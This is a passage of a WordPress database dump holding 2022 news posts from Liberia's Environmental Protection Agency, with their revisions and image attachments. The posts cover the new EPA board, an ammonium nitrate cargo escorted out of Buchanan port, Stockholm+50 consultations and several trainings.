-->\n\n<!-- wp:paragraph -->\n<p>“Let us be assertive to promote the establishment of school and community environmental clubs. They will serve as auxiliaries and partners in the work of EPA. We must employ persons, students and community dwellers, who will work under the management of EPA to make such entities and persons ambassadors of the EPA” he urged.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On Tuesday, April 19, President George Weah constituted the Board of Directors of the EPA; naming Businessman, Rupert Marshall from the private sector as Chairman and Prof. Wilson K. Tarpeh, Secretary of the Board.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":4669,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/05/image.png\" alt=\"\" class=\"wp-image-4669\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Board members appointed by the President include Mr. Samuel D. Tweah Jr., Minister of Finance and Development Planning; Madam Mawine G. Diggs, Minister of Commerce and Industries, Cllr. Frank Musa Dean, Minister of Justice, and C. Mike Doryen, Managing Director Forestry Development Authority.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other Board members include Cllr. Sylvester Rennie, President, Liberia National Bar Association (LNBA); the Rev. Dr. Julius S. Nelson, President University of Liberia and Ms. Kotati Karnga, a prominent citizen.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking further in his opening message, Mr. Marshall lauded the Government’s national and international partners for their support to the EPA. He announced with the endorsement of the Board, he will shortly commence courtesy visits to partners and potential partners so as to further strengthen the EPA’s relationships for the enhancement of its work.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also called on the Executive Director to establish sisterly relationships with some of the cleanliest cities on the African Continent to learn from them and apply the lessons learned.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Let’s go there and see for ourselves. Let’s take with us students, administrators, scientists and persons who sell in our markets and along our sidewalks so that all of us can learn from our fellow Africans on how to improve sanitation, and beautification and ensure an environment that will prevent any devastating effects to Liberians and mankind in general.”&nbsp;</p>\n<!-- /wp:paragraph -->','Environmental Protection Agency’s New Board Pledges Unflinching Support To Prof. Tarpeh’s Leadership','','publish','open','closed','','environmental-protection-agencys-new-board-pledges-unflinching-support-to-prof-tarpehs-leadership','','','2022-05-09 11:21:28','2022-05-09 11:21:28','',0,'https://ekmsliberia.info/?p=4668',133,'post','',0),(4669,42,'2022-05-09 11:10:49','2022-05-09 11:10:49','','image','','inherit','open','closed','','image-3','','','2022-05-09 11:10:49','2022-05-09 11:10:49','',4668,'https://ekmsliberia.info/wp-content/uploads/2022/05/image.png',0,'attachment','image/png',0),(4670,42,'2022-05-09 11:11:22','2022-05-09 11:11:22','<!-- wp:paragraph -->\n<p><strong>Monrovia – </strong>The newly constituted Board of Directors of Liberia’s Environmental Protection Agency (EPA) has pledged its unflinching support to the Executive Director Prof. Wilson K. Tarpeh, as they strive to achieve the goals and strategy policy of the Agency.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Board led by Chairman Rupert Marshall made the commitment during its first meeting since it was set up by President George M. Weah last month.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We join you within the terms of our reference to do what has to be done to enhance your work and let it have an impact within and beyond our borders,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said shortly after his appointment, he had opportunities to speak at several schools and urged the students to set up environmental clubs; adding that some schools already had such clubs, and those that do not have agreed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Let us be assertive to promote the establishment of school and community environmental clubs. They will serve as auxiliaries and partners in the work of EPA. We must employ persons, students and community dwellers, who will work under the management of EPA to make such entities and persons ambassadors of the EPA” he urged.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On Tuesday, April 19, President George Weah constituted the Board of Directors of the EPA; naming Businessman, Rupert Marshall from the private sector as Chairman and Prof. Wilson K. Tarpeh, Secretary of the Board.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":4669,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/05/image.png\" alt=\"\" class=\"wp-image-4669\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Board members appointed by the President include Mr. Samuel D. Tweah Jr., Minister of Finance and Development Planning; Madam Mawine G. Diggs, Minister of Commerce and Industries, Cllr. Frank Musa Dean, Minister of Justice, and C. Mike Doryen, Managing Director Forestry Development Authority.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other Board members include Cllr. Sylvester Rennie, President, Liberia National Bar Association (LNBA); the Rev. Dr. Julius S. Nelson, President University of Liberia and Ms. Kotati Karnga, a prominent citizen.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking further in his opening message, Mr. Marshall lauded the Government’s national and international partners for their support to the EPA. He announced with the endorsement of the Board, he will shortly commence courtesy visits to partners and potential partners so as to further strengthen the EPA’s relationships for the enhancement of its work.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also called on the Executive Director to establish sisterly relationships with some of the cleanliest cities on the African Continent to learn from them and apply the lessons learned.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Let’s go there and see for ourselves. Let’s take with us students, administrators, scientists and persons who sell in our markets and along our sidewalks so that all of us can learn from our fellow Africans on how to improve sanitation, and beautification and ensure an environment that will prevent any devastating effects to Liberians and mankind in general.”&nbsp;</p>\n<!-- /wp:paragraph -->','Environmental Protection Agency’s New Board Pledges Unflinching Support To Prof. Tarpeh’s Leadership','','inherit','closed','closed','','4668-revision-v1','','','2022-05-09 11:11:22','2022-05-09 11:11:22','',4668,'https://ekmsliberia.info/?p=4670',0,'revision','',0),(4671,42,'2022-05-09 11:16:53','2022-05-09 11:16:53','<!-- wp:paragraph -->\n<p>After a two-year delay occasioned by Covid19, the Government of Liberia today held an action dialogue in a bid to improve development aid coordination and impact.The dialogue included several ministers, development partners, the private sector and civil society .The dialogue is expected to demonstrate how development initiatives in the country are reducing poverty, unemployment and paving way for the prosperity of the country and its people.</p>\n<!-- /wp:paragraph -->','The Government of Liberia Today Held an Action Dialogue in a Bid to Improve Development Aid Coordination and Impact','','inherit','closed','closed','','4660-revision-v1','','','2022-05-09 11:16:53','2022-05-09 11:16:53','',4660,'https://ekmsliberia.info/?p=4671',0,'revision','',0),(4672,42,'2022-05-09 11:20:15','2022-05-09 11:20:15','','epa board chair','','inherit','open','closed','','epa-board-chair','','','2022-05-09 11:20:15','2022-05-09 11:20:15','',4668,'https://ekmsliberia.info/wp-content/uploads/2022/05/epa-board-chair.png',0,'attachment','image/png',0),(4674,42,'2022-03-07 11:22:00','2022-03-07 11:22:00','<!-- wp:paragraph -->\n<p>On March 6, 2022 the Environmental Protection Agency of Liberia (EPA) alerted the various national security apparatus about the presence of a mixture of AMMONIUM NITRATE and Heavy Fuel Oil (HFO) at the port of Buchanan, Grand Bassa County on board vessel EKMEN.The EPA alarmed the mixture of the substances was very hazardous to human health and also posed great risk to the environment and needed the swift intervention of all relevant security apparatus. Today, the EPA is happy to announce that after weeks of tireless engagements, the Ship MV EKMEN was escorted out of Liberian territorial waters. At departure time (18:00 hrs), the Ship contained 293 bags of contaminated ammonium nitrate. This rejected consignment is being repatriated to the country of origin, Turkey.The EPA expresses its appreciation to the Coast Guard of the Armed Forces of Liberia for ensuring that the vessel left Liberia\'s waters and is now headed to the next Port of Call in Abidjan. Speacial thanks to all actors that were involved. The Agency is truly committed to ensuring a safe, clean and healthy environment for all. </p>\n<!-- /wp:paragraph -->','The Environmental Protection Agency Alerts Authorities About Ammonium Nitrate & HFO Filled Vessel in Grand Bassa County','','publish','open','closed','','the-environmental-protection-agency-alerts-authorities-about-ammonium-nitrate-hfo-filled-vessel-in-grand-bassa-county','','','2022-05-09 11:28:44','2022-05-09 11:28:44','',0,'https://ekmsliberia.info/?p=4674',132,'post','',0),(4675,42,'2022-05-09 11:27:53','2022-05-09 11:27:53','','vessel','','inherit','open','closed','','vessel','','','2022-05-09 11:27:53','2022-05-09 11:27:53','',4674,'https://ekmsliberia.info/wp-content/uploads/2022/05/vessel.png',0,'attachment','image/png',0),(4676,42,'2022-05-09 11:28:42','2022-05-09 11:28:42','<!-- wp:paragraph -->\n<p>On March 6, 2022 the Environmental Protection Agency of Liberia (EPA) alerted the various national security apparatus about the presence of a mixture of AMMONIUM NITRATE and Heavy Fuel Oil (HFO) at the port of Buchanan, Grand Bassa County on board vessel EKMEN.The EPA alarmed the mixture of the substances was very hazardous to human health and also posed great risk to the environment and needed the swift intervention of all relevant security apparatus. Today, the EPA is happy to announce that after weeks of tireless engagements, the Ship MV EKMEN was escorted out of Liberian territorial waters. At departure time (18:00 hrs), the Ship contained 293 bags of contaminated ammonium nitrate. This rejected consignment is being repatriated to the country of origin, Turkey.The EPA expresses its appreciation to the Coast Guard of the Armed Forces of Liberia for ensuring that the vessel left Liberia\'s waters and is now headed to the next Port of Call in Abidjan. Speacial thanks to all actors that were involved. The Agency is truly committed to ensuring a safe, clean and healthy environment for all. </p>\n<!-- /wp:paragraph -->','The Environmental Protection Agency Alerts Authorities About Ammonium Nitrate & HFO Filled Vessel in Grand Bassa County','','inherit','closed','closed','','4674-revision-v1','','','2022-05-09 11:28:42','2022-05-09 11:28:42','',4674,'https://ekmsliberia.info/?p=4676',0,'revision','',0),(4677,42,'2022-03-24 11:30:00','2022-03-24 11:30:00','<!-- wp:paragraph -->\n<p>The Stockholm 50 regional consultations got underway on Wednesday, 23rd March, 2022 with an interactive conversation with students studying environmental science, public health, occupational safety, renewal energy engineering, emergency and disaster management at Harbel Collage in Margibi County. The consultation with the students seeks to chat how Liberia’s natural resources should be managed to benefit the country and its citizens.</p>\n<!-- /wp:paragraph -->','Stockholm +50 Underway in Margibi County','','publish','open','closed','','stockholm-50-underway-in-margibi-county','','','2022-05-09 11:38:14','2022-05-09 11:38:14','',0,'https://ekmsliberia.info/?p=4677',131,'post','',0),(4678,42,'2022-05-09 11:36:55','2022-05-09 11:36:55','','Stockholm 50','','inherit','open','closed','','stockholm-50','','','2022-05-09 11:36:55','2022-05-09 11:36:55','',4677,'https://ekmsliberia.info/wp-content/uploads/2022/05/Stockholm-50-.png',0,'attachment','image/png',0),(4679,42,'2022-05-09 11:37:47','2022-05-09 11:37:47','<!-- wp:paragraph -->\n<p>The Stockholm 50 regional consultations got underway on Wednesday, 23rd March, 2022 with an interactive conversation with students studying environmental science, public health, occupational safety, renewal energy engineering, emergency and disaster management at Harbel Collage in Margibi County. The consultation with the students seeks to chat how Liberia’s natural resources should be managed to benefit the country and its citizens.</p>\n<!-- /wp:paragraph -->','Stockholm 50+ Underway in Margibi County','','inherit','closed','closed','','4677-revision-v1','','','2022-05-09 11:37:47','2022-05-09 11:37:47','',4677,'https://ekmsliberia.info/?p=4679',0,'revision','',0),(4680,42,'2022-05-09 11:38:12','2022-05-09 11:38:12','<!-- wp:paragraph -->\n<p>The Stockholm 50 regional consultations got underway on Wednesday, 23rd March, 2022 with an interactive conversation with students studying environmental science, public health, occupational safety, renewal energy engineering, emergency and disaster management at Harbel Collage in Margibi County. The consultation with the students seeks to chat how Liberia’s natural resources should be managed to benefit the country and its citizens.</p>\n<!-- /wp:paragraph -->','Stockholm +50 Underway in Margibi County','','inherit','closed','closed','','4677-revision-v1','','','2022-05-09 11:38:12','2022-05-09 11:38:12','',4677,'https://ekmsliberia.info/?p=4680',0,'revision','',0),(4681,42,'2022-03-27 11:39:00','2022-03-27 11:39:00','<!-- wp:paragraph -->\n<p>At the first of two regional dialogues in Buchanan, Grand Bassa in support of Stockholm +50, the EPA and UNDP initiated an inclusive debate looking at what has and hasn’t been achieved 50 years, since the UN Environmental Conference in Stockholm, Sweden.Against this The Liberian government through the Environment Protection Agency - EPA and the UNDP have begun a series of consultations on what is needed to ensure a healthy planet for the prosperity of all ahead of the 50th anniversary meeting of the United Nations Environment Conference in Sweden, June.</p>\n<!-- /wp:paragraph -->','The EPA and UNDP Initiated an Inclusive Debate in Grand Bassa County Relating to the Stockholm +50','','publish','open','closed','','the-epa-and-undp-initiated-an-inclusive-debate-in-grand-bassa-county-relating-to-the-stockholm-50','','','2022-05-09 11:55:25','2022-05-09 11:55:25','',0,'https://ekmsliberia.info/?p=4681',130,'post','',0),(4682,42,'2022-05-09 11:51:42','2022-05-09 11:51:42','','stockholm grand bassa','','inherit','open','closed','','stockholm-grand-bassa','','','2022-05-09 11:51:42','2022-05-09 11:51:42','',4681,'https://ekmsliberia.info/wp-content/uploads/2022/05/stockholm-grand-bassa.png',0,'attachment','image/png',0),(4683,42,'2022-05-09 11:52:44','2022-05-09 11:52:44','<!-- wp:paragraph -->\n<p>At the first of two regional dialogues in Buchanan, Grand Bassa in support of Stockholm +50, the EPA and UNDP initiated an inclusive debate looking at what has and hasn’t been achieved 50 years, since the UN Environmental Conference in Stockholm, Sweden.Against this The Liberian government through the Environment Protection Agency - EPA and the UNDP have begun a series of consultations on what is needed to ensure a healthy planet for the prosperity of all ahead of the 50th anniversary meeting of the United Nations Environment Conference in Sweden, June.</p>\n<!-- /wp:paragraph -->','The EPA and UNDP Initiated an Inclusive Debate in Grand Bassa County Relating to the Stockholm +50','','inherit','closed','closed','','4681-revision-v1','','','2022-05-09 11:52:44','2022-05-09 11:52:44','',4681,'https://ekmsliberia.info/?p=4683',0,'revision','',0),(4685,42,'2022-03-31 12:03:00','2022-03-31 12:03:00','<!-- wp:paragraph -->\n<p>Liberia Environmental Protection Agency and the United Nations Development Program UNDP-Liberia have concluded a one day regional consultations on Stockholm50 in Gompa, Nimba County with six panel discussions on various environmental topics which focused on sustainable Environmental management and development. The issues of waste management and the sustainable management of the forest dominated the interactive discussion, which attracted superintendents, city majors, women and youth groups from several counties including Maryland, Grand Gedeh, Nimba, Lofa and Bong counties.</p>\n<!-- /wp:paragraph -->','EPA & UNDP Conclude One-Day Stockholm+50 National Consultations Regional Dialogue in Gompa, Nimba County','','publish','open','closed','','epa-undp-conclude-one-day-stockholm50-national-consultations-regional-dialogue-in-gompa-nimba-county','','','2022-05-09 12:04:14','2022-05-09 12:04:14','',0,'https://ekmsliberia.info/?p=4685',129,'post','',0),(4686,42,'2022-05-09 12:03:17','2022-05-09 12:03:17','','Stockholm Nimba County','','inherit','open','closed','','stockholm-nimba-county','','','2022-05-09 12:03:17','2022-05-09 12:03:17','',4685,'https://ekmsliberia.info/wp-content/uploads/2022/05/Stockholm-Nimba-County.png',0,'attachment','image/png',0),(4687,42,'2022-05-09 12:03:52','2022-05-09 12:03:52','<!-- wp:paragraph -->\n<p>Liberia Environmental Protection Agency and the United Nations Development Program UNDP-Liberia have concluded a one day regional consultations on Stockholm50 in Gompa, Nimba County with six panel discussions on various environmental topics which focused on sustainable Environmental management and development. The issues of waste management and the sustainable management of the forest dominated the interactive discussion, which attracted superintendents, city majors, women and youth groups from several counties including Maryland, Grand Gedeh, Nimba, Lofa and Bong counties.</p>\n<!-- /wp:paragraph -->','EPA & UNDP Conclude One-Day Stockholm+50 National Consultations Regional Dialogue in Gompa, Nimba County','','inherit','closed','closed','','4685-revision-v1','','','2022-05-09 12:03:52','2022-05-09 12:03:52','',4685,'https://ekmsliberia.info/?p=4687',0,'revision','',0),(4688,42,'2022-03-31 12:04:00','2022-03-31 12:04:00','<!-- wp:paragraph -->\n<p>The department of Planning and Policy at the EPA on Wednesday March 30, 2022, hosted it first quarterly environmental sector working group ( ESWG) meeting aimed at providing update previous secretariat meeting and prepare annual work plan and budget to support the effective coordination amongst line ministries and agencies for environmental reporting (ER).</p>\n<!-- /wp:paragraph -->','EPA\'s Planning & Policy Department Holds First Environmental Sector Working Group Meeting','','publish','open','closed','','epas-planning-policy-department-holds-first-environmental-sector-working-group-meeting','','','2022-05-09 12:09:53','2022-05-09 12:09:53','',0,'https://ekmsliberia.info/?p=4688',128,'post','',0),(4689,42,'2022-05-09 12:08:46','2022-05-09 12:08:46','','EPA','','inherit','open','closed','','epa-7','','','2022-05-09 12:08:46','2022-05-09 12:08:46','',4688,'https://ekmsliberia.info/wp-content/uploads/2022/05/EPA.png',0,'attachment','image/png',0),(4690,42,'2022-05-09 12:09:48','2022-05-09 12:09:48','<!-- wp:paragraph -->\n<p>The department of Planning and Policy at the EPA on Wednesday March 30, 2022, hosted it first quarterly environmental sector working group ( ESWG) meeting aimed at providing update previous secretariat meeting and prepare annual work plan and budget to support the effective coordination amongst line ministries and agencies for environmental reporting (ER).</p>\n<!-- /wp:paragraph -->','EPA\'s Planning & Policy Department Holds First Environmental Sector Working Group Meeting','','inherit','closed','closed','','4688-revision-v1','','','2022-05-09 12:09:48','2022-05-09 12:09:48','',4688,'https://ekmsliberia.info/?p=4690',0,'revision','',0),(4691,42,'2022-04-06 12:11:00','2022-04-06 12:11:00','<!-- wp:paragraph -->\n<p>EPA in collaboration with Conservation International, Liberia with support from Embassy of Sweden in Monrovia and Global Environment Facility (GEF) on Tuesday, April 5, 2022 organized a one-day Joint National Capitol Accounting (NCA) &amp; Blue Ocean Programme Steering Committee Meeting. At the meeting, members of the committee reviewed past progress report NCA, approved the quarterly work plan and budget of NCA, finalized the formulation of a small grant appraisal committee. The team also reviewed and approved the BOP upcoming activities, progress report in previous quarter… Against these actions, EPA boss Prof. Wilson K. Tarpeh extended his appreciation to the team, encouraged them to work harder and urged them to continue being accountable and transparent in their workings. “The issue of being Accountable and Transparent can’t not be overlooked, one gets rewarded unknowingly. So, all members are encouraged to continue the level of transparency and proof of accountability shown”.</p>\n<!-- /wp:paragraph -->','EPA With Support From the Swedish Embassy in Liberia & GEF Organized a One-Day Joint National Capitol Accounting (NCA) & Blue Ocean Programme Steering Committee Meeting','','publish','open','closed','','epa-with-support-from-the-swedish-embassy-in-liberia-gef-organized-a-one-day-joint-national-capitol-accounting-nca-blue-ocean-programme-steering-committee-meeting','','','2022-05-09 12:16:36','2022-05-09 12:16:36','',0,'https://ekmsliberia.info/?p=4691',127,'post','',0),(4692,42,'2022-05-09 12:15:26','2022-05-09 12:15:26','','Joint meeting','','inherit','open','closed','','joint-meeting','','','2022-05-09 12:15:26','2022-05-09 12:15:26','',4691,'https://ekmsliberia.info/wp-content/uploads/2022/05/Joint-meeting.png',0,'attachment','image/png',0),(4693,42,'2022-05-09 12:16:36','2022-05-09 12:16:36','<!-- wp:paragraph -->\n<p>EPA in collaboration with Conservation International, Liberia with support from Embassy of Sweden in Monrovia and Global Environment Facility (GEF) on Tuesday, April 5, 2022 organized a one-day Joint National Capitol Accounting (NCA) &amp; Blue Ocean Programme Steering Committee Meeting. At the meeting, members of the committee reviewed past progress report NCA, approved the quarterly work plan and budget of NCA, finalized the formulation of a small grant appraisal committee. The team also reviewed and approved the BOP upcoming activities, progress report in previous quarter… Against these actions, EPA boss Prof. Wilson K. Tarpeh extended his appreciation to the team, encouraged them to work harder and urged them to continue being accountable and transparent in their workings. “The issue of being Accountable and Transparent can’t not be overlooked, one gets rewarded unknowingly. So, all members are encouraged to continue the level of transparency and proof of accountability shown”.</p>\n<!-- /wp:paragraph -->','EPA With Support From the Swedish Embassy in Liberia & GEF Organized a One-Day Joint National Capitol Accounting (NCA) & Blue Ocean Programme Steering Committee Meeting','','inherit','closed','closed','','4691-revision-v1','','','2022-05-09 12:16:36','2022-05-09 12:16:36','',4691,'https://ekmsliberia.info/?p=4693',0,'revision','',0),(4694,42,'2022-04-07 12:16:00','2022-04-07 12:16:00','<!-- wp:paragraph -->\n<p>A two- day regional conference on Climate Change, Peace and Security in West Africa and the Sahel has kicked off at Radisson Blu in Dakar, Senegal. The gathering is co- organized by Senegal, the UN Office for West Africa and the Sahel (UNOWAS), the Government of Ireland, the Government of Ghana in cooperation with ECOWAS. The conference runs from April 6-7, 2022, among many other things seeks to define in a concrete manner the adverse implications of climate change, energy, poverty, ecological changes and natural disasters on human security in West Africa and the Sahel. The Environmental Protection Agency of Liberia EPA is being represented by Arthur R.M. Becker, Project Officer in the Department of Multilateral Environmental Agreements (MEA).</p>\n<!-- /wp:paragraph -->','A Two-Day Regional Conference on Climate Change, Peace and Security in West Africa and the Sahel Has Kicked Off in Dakar, Senegal','','publish','open','closed','','a-two-day-regional-conference-on-climate-change-peace-and-security-in-west-africa-and-the-sahel-has-kicked-off-in-dakar-senegal','','','2022-05-09 12:23:25','2022-05-09 12:23:25','',0,'https://ekmsliberia.info/?p=4694',126,'post','',0),(4695,42,'2022-05-09 12:21:51','2022-05-09 12:21:51','','Climate Change Conference','','inherit','open','closed','','climate-change-conference','','','2022-05-09 12:21:51','2022-05-09 12:21:51','',4694,'https://ekmsliberia.info/wp-content/uploads/2022/05/Climate-Change-Conference.png',0,'attachment','image/png',0),(4696,42,'2022-05-09 12:23:21','2022-05-09 12:23:21','<!-- wp:paragraph -->\n<p>A two- day regional conference on Climate Change, Peace and Security in West Africa and the Sahel has kicked off at Radisson Blu in Dakar, Senegal. The gathering is co- organized by Senegal, the UN Office for West Africa and the Sahel (UNOWAS), the Government of Ireland, the Government of Ghana in cooperation with ECOWAS. The conference runs from April 6-7, 2022, among many other things seeks to define in a concrete manner the adverse implications of climate change, energy, poverty, ecological changes and natural disasters on human security in West Africa and the Sahel. The Environmental Protection Agency of Liberia EPA is being represented by Arthur R.M. Becker, Project Officer in the Department of Multilateral Environmental Agreements (MEA).</p>\n<!-- /wp:paragraph -->','A Two-Day Regional Conference on Climate Change, Peace and Security in West Africa and the Sahel Has Kicked Off in Dakar, Senegal','','inherit','closed','closed','','4694-revision-v1','','','2022-05-09 12:23:21','2022-05-09 12:23:21','',4694,'https://ekmsliberia.info/?p=4696',0,'revision','',0),(4697,42,'2022-04-08 12:23:00','2022-04-08 12:23:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia in Partnership with the United Nations Development and Partners (UNDP) begin a three-day enhanced capacity training for community structures on biodiversity conservation to improve biodiversity Conservation and environmental awareness in Robertsport, Grand Cape Mount County. In opening remarks, Hon. Randall M. Dobayou, Deputy Executive Director of EPA, welcomed participants to the training, he further urged participants to take the training seriously. He applauded the citizen of Grand Cape mount County through the City Mayor\'s office for implementing the message of keeping a clean and green city being preached by the Environment Protection Agency - EPA</p>\n<!-- /wp:paragraph -->','EPA, UNDP and Partners Hold Enhanced Capacity Training on Biodiversity Conservation','','publish','open','closed','','epa-undp-and-partners-hold-enhanced-capacity-training-on-biodiversity-conservation','','','2022-05-09 12:29:42','2022-05-09 12:29:42','',0,'https://ekmsliberia.info/?p=4697',125,'post','',0),(4698,42,'2022-05-09 12:28:52','2022-05-09 12:28:52','','conservation training','','inherit','open','closed','','conservation-training','','','2022-05-09 12:28:52','2022-05-09 12:28:52','',4697,'https://ekmsliberia.info/wp-content/uploads/2022/05/conservation-training.png',0,'attachment','image/png',0),(4699,42,'2022-05-09 12:29:40','2022-05-09 12:29:40','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia in Partnership with the United Nations Development and Partners (UNDP) begin a three-day enhanced capacity training for community structures on biodiversity conservation to improve biodiversity Conservation and environmental awareness in Robertsport, Grand Cape Mount County. In opening remarks, Hon. Randall M. Dobayou, Deputy Executive Director of EPA, welcomed participants to the training, he further urged participants to take the training seriously. He applauded the citizen of Grand Cape mount County through the City Mayor\'s office for implementing the message of keeping a clean and green city being preached by the Environment Protection Agency - EPA</p>\n<!-- /wp:paragraph -->','EPA, UNDP and Partners Hold Enhanced Capacity Training on Biodiversity Conservation','','inherit','closed','closed','','4697-revision-v1','','','2022-05-09 12:29:40','2022-05-09 12:29:40','',4697,'https://ekmsliberia.info/?p=4699',0,'revision','',0),(4700,42,'2022-04-07 12:30:00','2022-04-07 12:30:00','<!-- wp:paragraph -->\n<p>The EPA through its National Ozone Unit and in conjunction with the German Agency for International Cooperation (GIZ) over the weekend concluded a series of refrigeration and air-conditioning technician training workshop under the Hydrochlorofluorocarbon Phase put Management Plan (HPMP). The training workshops were held under the theme: “Refrigeration and Air-conditioning Techniques, Safety and Best Practices.”</p>\n<!-- /wp:paragraph -->','EPA, Through Its National Ozone Unit & GIZ Held a Refrigeration and Air-Conditioning Technician Training Workshop','','publish','open','closed','','epa-through-its-national-ozone-unit-giz-held-a-refrigeration-and-air-conditioning-technician-training-workshop','','','2022-05-09 15:43:40','2022-05-09 15:43:40','',0,'https://ekmsliberia.info/?p=4700',124,'post','',0),(4701,42,'2022-05-09 15:42:46','2022-05-09 15:42:46','','epa, giz','','inherit','open','closed','','epa-giz-2','','','2022-05-09 15:42:46','2022-05-09 15:42:46','',4700,'https://ekmsliberia.info/wp-content/uploads/2022/05/epa-giz.png',0,'attachment','image/png',0),(4702,42,'2022-05-09 15:43:38','2022-05-09 15:43:38','<!-- wp:paragraph -->\n<p>The EPA through its National Ozone Unit and in conjunction with the German Agency for International Cooperation (GIZ) over the weekend concluded a series of refrigeration and air-conditioning technician training workshop under the Hydrochlorofluorocarbon Phase put Management Plan (HPMP). The training workshops were held under the theme: “Refrigeration and Air-conditioning Techniques, Safety and Best Practices.”</p>\n<!-- /wp:paragraph -->','EPA, Through Its National Ozone Unit & GIZ Held a Refrigeration and Air-Conditioning Technician Training Workshop','','inherit','closed','closed','','4700-revision-v1','','','2022-05-09 15:43:38','2022-05-09 15:43:38','',4700,'https://ekmsliberia.info/?p=4702',0,'revision','',0),(4703,42,'2022-04-08 15:44:00','2022-04-08 15:44:00','<!-- wp:paragraph -->\n<p>EPA Deputy Executive Director, Hon. Randall M. Dobayou on Wednesday, April 7, 2022 spoke to a group of students from different Catholic Schools in Liberia on Sustainable Waste Management. Organized by Radio Maria, the gathering was intended to create awareness among high school students on sustainable waste management. Mr. Dobayou provided explanation on solid waste and how to effectively practice reducing, reusing, recycling and sorting of waste in schools and communities.</p>\n<!-- /wp:paragraph -->','EPA\'s Deputy Executive Director, Randall M. Dobayou, Speaks to Students on Sustainable Waste Management','','publish','open','closed','','epas-deputy-executive-director-randall-m-dobayou-speaks-to-students-on-sustainable-waste-management','','','2022-05-09 15:49:03','2022-05-09 15:49:03','',0,'https://ekmsliberia.info/?p=4703',123,'post','',0),(4704,42,'2022-05-09 15:48:43','2022-05-09 15:48:43','','DED','','inherit','open','closed','','ded-4','','','2022-05-09 15:48:43','2022-05-09 15:48:43','',4703,'https://ekmsliberia.info/wp-content/uploads/2022/05/DED-.png',0,'attachment','image/png',0),(4705,42,'2022-05-09 15:49:01','2022-05-09 15:49:01','<!-- wp:paragraph -->\n<p>EPA Deputy Executive Director, Hon. Randall M. Dobayou on Wednesday, April 7, 2022 spoke to a group of students from different Catholic Schools in Liberia on Sustainable Waste Management. Organized by Radio Maria, the gathering was intended to create awareness among high school students on sustainable waste management. Mr. Dobayou provided explanation on solid waste and how to effectively practice reducing, reusing, recycling and sorting of waste in schools and communities.</p>\n<!-- /wp:paragraph -->','EPA\'s Deputy Executive Director, Randall M. Dobayou, Speaks to Students on Sustainable Waste Management','','inherit','closed','closed','','4703-revision-v1','','','2022-05-09 15:49:01','2022-05-09 15:49:01','',4703,'https://ekmsliberia.info/?p=4705',0,'revision','',0),(4706,42,'2022-04-13 15:49:00','2022-04-13 15:49:00','<!-- wp:paragraph -->\n<p>EPA through its Cross-Cutting Capacity Development Project (CCCD) in collaboration with UNDP on April 13, 2022 convey a three-day validation workshop under the Theme \"Capacity Development Strategy and Action Plan\" held in Gompa City, Nimba County with the objective of making better decisions to meet and sustain global environmental obligations. Building Capacity validation workshop is meant to coordinate efforts as well as best practices for integrating global environmental priorities into planning, decision making and reporting processes is key to their activities of the CCCD. </p>\n<!-- /wp:paragraph -->','EPA, Through the CCCD Project Conducts a Three-Day Validation Workshop for the Capacity Development Strategy and Action Plan','','publish','open','closed','','epa-through-the-cccd-project-conducts-a-three-day-validation-workshop-for-the-capacity-development-strategy-and-action-plan','','','2022-05-09 15:53:16','2022-05-09 15:53:16','',0,'https://ekmsliberia.info/?p=4706',122,'post','',0),(4707,42,'2022-05-09 15:52:49','2022-05-09 15:52:49','','validation workshop','','inherit','open','closed','','validation-workshop','','','2022-05-09 15:52:49','2022-05-09 15:52:49','',4706,'https://ekmsliberia.info/wp-content/uploads/2022/05/validation-workshop.png',0,'attachment','image/png',0);
INSERT INTO `wp_posts` VALUES (4708,42,'2022-05-09 15:53:14','2022-05-09 15:53:14','<!-- wp:paragraph -->\n<p>EPA through its Cross-Cutting Capacity Development Project (CCCD) in collaboration with UNDP on April 13, 2022 convey a three-day validation workshop under the Theme \"Capacity Development Strategy and Action Plan\" held in Gompa City, Nimba County with the objective of making better decisions to meet and sustain global environmental obligations. Building Capacity validation workshop is meant to coordinate efforts as well as best practices for integrating global environmental priorities into planning, decision making and reporting processes is key to their activities of the CCCD. </p>\n<!-- /wp:paragraph -->','EPA, Through the CCCD Project Conducts a Three-Day Validation Workshop for the Capacity Development Strategy and Action Plan','','inherit','closed','closed','','4706-revision-v1','','','2022-05-09 15:53:14','2022-05-09 15:53:14','',4706,'https://ekmsliberia.info/?p=4708',0,'revision','',0),(4709,42,'2022-04-14 15:53:00','2022-04-14 15:53:00','<!-- wp:paragraph -->\n<p>A team of EPA technicians today April 14, 2022 conducted a comprehensive Environmental Monitoring of the New Liberty Gold Mines in Kinjor, Grand Capemount County to ensure Environmental compliance… During the visit, the team inspected the Tailing Storage 